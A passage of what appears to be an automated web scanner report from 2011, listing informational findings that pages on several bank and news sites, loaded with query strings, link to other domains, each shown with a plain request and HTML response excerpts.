</strong> <a href="https://www.citizensbankonline.com">Login</a>
...[SNIP]...
<div class="borderButtonWrapper">
<a href="https://www.citizensbankonline.com/en.html" class="input borderButton">Enroll Now</a>
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcssdhxcq00000008yjgz9rbs_9d3h/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

16.82. http://www.citizensbank.com/tools/leaving.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /tools/leaving.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /tools/leaving.aspx?url=http://www.fdic.gov HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:46 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 13513


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcssdhxcq00000008yjgz9rbs_9d3h/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

16.83. http://www.citizensbank.com/tools/regionalgateway.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /tools/regionalgateway.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /tools/regionalgateway.aspx?url=%2fdefault.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: HiddenPopup=popup=False; path=/
Set-Cookie: HiddenError=error=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17327


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcssdhxcq00000008yjgz9rbs_9d3h/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

16.84. http://www.citizensbank.com/trufitstudentloan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /trufitstudentloan/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /trufitstudentloan/?WT.ac=trufitstudentloan HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:22:29 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 47626


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...
<li><a href="https://firstapp2.firstmarkservices.com/citizensbank/consumer/" class="borderButton">Apply now</a>
...[SNIP]...
<p><a href="https://firstapp2.firstmarkservices.com/citizensbank/consumer/" class="borderButton">Apply now</a>
...[SNIP]...
<p><a href="https://firstapp2.firstmarkservices.com/citizensbank/consumer/" class="borderButton">Apply now</a>
...[SNIP]...
<p>
<a class="borderButton" href="https://firstapp2.firstmarkservices.com/citizensbank/consumer/">Apply now</a>
...[SNIP]...
<p>
<a class="borderButton" href="https://firstapp2.firstmarkservices.com/citizensbank/consumer/">Apply now</a>
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcssdhxcq00000008yjgz9rbs_9d3h/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

16.85. http://www.emagazine.com/view/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emagazine.com
Path:   /view/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /view/?5489 HTTP/1.1
Host: www.emagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:39 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix) mod_perl/1.30 PHP/4.3.4
X-Powered-By: PHP/4.3.4
Set-Cookie: PHPSESSID=ba6bb514b1fca2c3b23a260e9b9739c2; path=/; domain=www.emagazine.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 61787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    <html><head><title>More Sustainable Sushi (By Brita Belli)</title><meta name=
...[SNIP]...
<td id='cl14'><a href='https://subscribe.pcspublink.com/subscribeFormGeneric.asp?track=JWHPG9&amp;pub=EMAG&amp;term=6' id='tx14' >Subscribe Today</a>
...[SNIP]...
<td id='cl14'><a href='http://visitor.constantcontact.com/optin.jsp?m=1101122473130' id='tx14' >Sign Up for our Free Newsletter</a>
...[SNIP]...
<td id=cl24><a href='https://subscribe.pcspublink.com/subscribeFormGeneric.asp?track=JWHPG9&amp;pub=EMAG&amp;term=6' id='dv24' onmouseover='this.style.color="#FFEEAA"; this.style.textDecoration="underline";' onmouseout='this.style.color="#FFCF31";this.style.textDecoration="none";' >SUBSCRIBE</a>
...[SNIP]...
<td id=cl24><a href='https://secure.groundspring.org/dn/index.php?id=1805' id='dv24' onmouseover='this.style.color="#FFEEAA"; this.style.textDecoration="underline";' onmouseout='this.style.color="#FFCF31";this.style.textDecoration="none";' >DONATE</a>
...[SNIP]...
</span><a href='https://subscribe.pcspublink.com/subscribeFormGeneric.asp?track=JWHPG9&amp;pub=EMAG&amp;term=6' id='tx46' onmouseover='this.style.color="#227744"; this.style.textDecoration="underline";' onmouseout='this.style.color="#000000"; this.style.textDecoration="none"' >Renewals</a>
...[SNIP]...
</span><a href='https://subscribe.pcspublink.com/subscribeFormGeneric.asp?track=JWHPG9&amp;pub=EMAG&amp;term=6' id='tx46' onmouseover='this.style.color="#227744"; this.style.textDecoration="underline";' onmouseout='this.style.color="#000000"; this.style.textDecoration="none"' >Gift Subscriptions</a>
...[SNIP]...
<font id=articleText>SOURCE: <a href="http://www.biologicaldiversity.org/species/fish/Atlantic_bluefin_tuna/bluefin_boycott/index.html">Center for Biological Diversity</a>
...[SNIP]...
</table>Did you enjoy this article? <a href='https://subscribe.pcspublink.com/subscribeFormGeneric.asp?track=JWHPG9&pub=EMAG&term=6'><b>
...[SNIP]...
<br />For photocopy or other reuse requests please click this link: <a href=http://www.copyright.com/ccc/do/showConfigurator><IMG SRC=http://www.emagazine.com/images/copyright.jpg border=0>
...[SNIP]...
<br><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=5a3dfb46-bd0c-4707-8454-75915228b408&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...
</B> fails to meet my expectations, I can write 'cancel' on the bill, return it to you and owe nothing. The FREE TRIAL ISSUE is mine to keep without further obligation. <a href="https://subscribe.pcspublink.com/subscribeFormGeneric.asp?track=JWHPG9&pub=EMAG&term=6">Free offer for U.S. residents only. Canadian and foreign subscribers please click here.</A>
...[SNIP]...
</script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<p><a href="http://www.volusion.com">Shopping Cart</a> and <a href="http://www.volusion.com">eCommerce Software</a> by Volusion <a href="http://www.volusion.com">eCommerce Solutions</a>
...[SNIP]...
<td id='cl58'><a href='http://www.ennmagazine.com/12all/index.php?action=subscribe&amp;mode=view_subscribe&amp;funcml=&amp;mlt=&amp;nl=2&amp;email' id='tx58' ><img src="http://www.emagazine.com/images/ennanim2006.gif" border="0" width="120" height="60" />
...[SNIP]...
<font color='white'><a href='http://www.mediawebsite.net/emag/menu/?catSetID=7007&catID=290787 '>Environmental News Releases</a>
...[SNIP]...
<font color='white'><a href='http://www.mediawebsite.net/emag/menu/?catSetID=7012&catID=291622'>Conservation/Recycling News Releases</a>
...[SNIP]...
<td id=cl24><a href='https://subscribe.pcspublink.com/subscribeFormGeneric.asp?track=JWHPG9&amp;pub=EMAG&amp;term=6' id='dv24' onmouseover='this.style.color="#FFEEAA"; this.style.textDecoration="underline";' onmouseout='this.style.color="#FFCF31";this.style.textDecoration="none";' >SUBSCRIBE</a>
...[SNIP]...
<td id=cl24><a href='https://secure.groundspring.org/dn/index.php?id=1805' id='dv24' onmouseover='this.style.color="#FFEEAA"; this.style.textDecoration="underline";' onmouseout='this.style.color="#FFCF31";this.style.textDecoration="none";' >DONATE</a>
...[SNIP]...

16.86. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?action=like&api_key=167973672925&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df39d5d5ad%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff27f92d41%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 22:25:45 GMT
Content-Length: 10591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yt/r/CJLVmfhHQeD.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

16.87. http://www.firstnational.com/001/html/en/personal/online_serv/account_alerts.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/online_serv/account_alerts.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /001/html/en/personal/online_serv/account_alerts.html?utm_id=29 HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 26280
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:20:10 GMT
Accept-Ranges: bytes
ETag: "0b9334516b8cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:22 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...
<div class="sidebar_item">
                           
                                   <a href="http://www.bankgreentoday.com"><img src="/common/library/web/01/001/images/green/sidebar_green_logo.gif" alt="Bank Green Today" />
...[SNIP]...

16.88. http://www.firstnational.com/001/html/en/personal/online_serv/online_banking.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/online_serv/online_banking.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /001/html/en/personal/online_serv/online_banking.html?utm_id=25 HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 26010
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:20:18 GMT
Accept-Ranges: bytes
ETag: "06df84916b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:16 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...
<div class="sidebar_item">
                           
                                   <a href="http://www.bankgreentoday.com"><img src="/common/library/web/01/001/images/green/sidebar_green_logo.gif" alt="Bank Green Today" />
...[SNIP]...

16.89. http://www.firstnational.com/001/html/en/personal/online_serv/online_billpay.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/online_serv/online_billpay.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /001/html/en/personal/online_serv/online_billpay.html?utm_id=10 HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 25854
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:20:21 GMT
Accept-Ranges: bytes
ETag: "8030c24b16b8cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:12 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...
<div class="sidebar_item">
                           
                                   <a href="http://www.bankgreentoday.com"><img src="/common/library/web/01/001/images/green/sidebar_green_logo.gif" alt="Bank Green Today!" />
...[SNIP]...

16.90. http://www.firstnational.com/001/html/en/personal/online_serv/online_services.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/online_serv/online_services.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /001/html/en/personal/online_serv/online_services.html?utm_id=23 HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 26475
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:20:42 GMT
Accept-Ranges: bytes
ETag: "089465816b8cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:07 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...
<p>Online banking can make a difference in your life and the environment.&#160; Learn how banking online improves our environment at <a href="http://www.bankgreentoday.com/">bankgreentoday.com</a>
...[SNIP]...
<li><a href="http://www.rebateshare.com/firstshop"><a href="javascript:siteDisclosure('nonaffiliate','First National Bank','First Shop','http://www.rebateshare.com/firstshop','yes');">
...[SNIP]...

16.91. http://www.firstnational.com/001/html/en/personal/online_serv/paperless_statements.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/online_serv/paperless_statements.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /001/html/en/personal/online_serv/paperless_statements.html?utm_id=26 HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 26663
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:20:24 GMT
Accept-Ranges: bytes
ETag: "0f48b4d16b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:19 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...
<div class="sidebar_item">
                           
                                   <a href="http://www.bankgreentoday.com"><img src="/common/library/web/01/001/images/green/sidebar_green_logo.gif" alt="Bank Green Today" />
...[SNIP]...

16.92. http://www.firstnational.com/001/html/en/personal/pers_products_serv/banking_accts/checking_accts/checking_accounts.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/pers_products_serv/banking_accts/checking_accts/checking_accounts.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /001/html/en/personal/pers_products_serv/banking_accts/checking_accts/checking_accounts.html?utm_id=11 HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 29651
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:21:08 GMT
Accept-Ranges: bytes
ETag: "0d2c56716b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:39 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...
<div class="sidebar_item">
                           
                                   <a href="http://www.bankgreentoday.com"><img src="/common/library/web/01/001/images/green/sidebar_green_logo.gif" alt="Bank Green Today" />
...[SNIP]...

16.93. http://www.firstnational.com/001/html/en/personal/pers_products_serv/first_at_work/firstatwork_program.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/pers_products_serv/first_at_work/firstatwork_program.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /001/html/en/personal/pers_products_serv/first_at_work/firstatwork_program.html?utm_id=21 HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 27295
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:22:07 GMT
Accept-Ranges: bytes
ETag: "8081f08a16b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:46 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...
<div class="sidebar_item">
                           
                                   <a href="http://www.bankgreentoday.com"><img src="/common/library/web/01/001/images/green/sidebar_green_logo.gif" alt="Bank Green Today!" />
...[SNIP]...

16.94. http://www.firstnational.com/001/html/en/personal/pers_products_serv/loan_accts/mortgage_loans/mortgage_loans.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/pers_products_serv/loan_accts/mortgage_loans/mortgage_loans.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /001/html/en/personal/pers_products_serv/loan_accts/mortgage_loans/mortgage_loans.html?utm_id=9 HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 31127
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:23:00 GMT
Accept-Ranges: bytes
ETag: "0aa87aa16b8cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:35 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...
<li class="address"><a href="https://empowerasp.lendingsvcs.com/fnhl.consumer/mssearch.aspx" target="_blank">Locate a Mortgage Specialist</a>
...[SNIP]...
<div class="sidebar_item">
                           
                           
                                                                                                   <a href="https://empowerasp.lendingsvcs.com/fnhl.consumer/application.aspx" target="_blank"><img src="/config/html/en/mortgage/btn-my-loan-status.png" width="171" height="39" class="button" alt="My Loan Status - Check the progress of your loan" title="" />
...[SNIP]...
<li><a href="https://empowerasp.lendingsvcs.com/fnhl.consumer/application.aspx" target="_blank">Start Application Now</a>
...[SNIP]...
<li><a href="https://empowerasp.lendingsvcs.com/fnhl.consumer/currentrates.aspx" target="_blank">Current Rates</a>
...[SNIP]...
<li><a href="https://empowerasp.lendingsvcs.com/fnhl.consumer/compareloans.aspx" target="_blank">Compare Loans</a>
...[SNIP]...
<div id="column_1">
           
           
                               <a class="action" href="https://empowerasp.lendingsvcs.com/fnhl.consumer/application.aspx" target="_blank"><img class="button1" title="" alt="Get a Home Loan - Start Now" src="/config/html/en/mortgage/btn-get-a-home-loan.png" width="180" height="36" /></a> <a class="action" href="https://empowerasp.lendingsvcs.com/fnhl.consumer/application.aspx" target="_blank"><img class="button2" title="" alt="Refinance - Start Now" src="/config/html/en/mortgage/btn-refinance.png" width="180" height="36" /></a> <a class="action" href="https://empowerasp.lendingsvcs.com/fnhl.consumer/application.aspx" target="_blank"><img class="button3" title="" alt="Continue Application In Progress" src="/config/html/en/mortgage/btn-continue-application.png" width="180" height="36" />
...[SNIP]...
</p><a href="https://empowerasp.lendingsvcs.com/fnhl.consumer/currentrates.aspx" target="_blank">Check Rates</a>
...[SNIP]...
</p><a href="https://empowerasp.lendingsvcs.com/fnhl.consumer/mssearch.aspx" target="_blank">Start Now</a>
...[SNIP]...
<p>Determine which type of financing is right for you. <a href="https://empowerasp.lendingsvcs.com/fnhl.consumer/compareloans.aspx" target="_blank">Start&#160;Now</a>
...[SNIP]...

16.95. http://www.fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /fis/worldnews/worldnews.asp?l=e&country=0&special=&monthyear=&day=&id=40138&ndb=1&df=0 HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:58:55 GMT
Connection: close
Content-Length: 85187
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=BNHBFPGBFIEBPIMMLFCBGCMM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Government committs to almadraba for furt
...[SNIP]...
<td>
           <a href="http://www.fishbase.org/search.html" target="_blank">
               <img src="/fis/gif/nav/directory-e.jpg" border="0">
...[SNIP]...
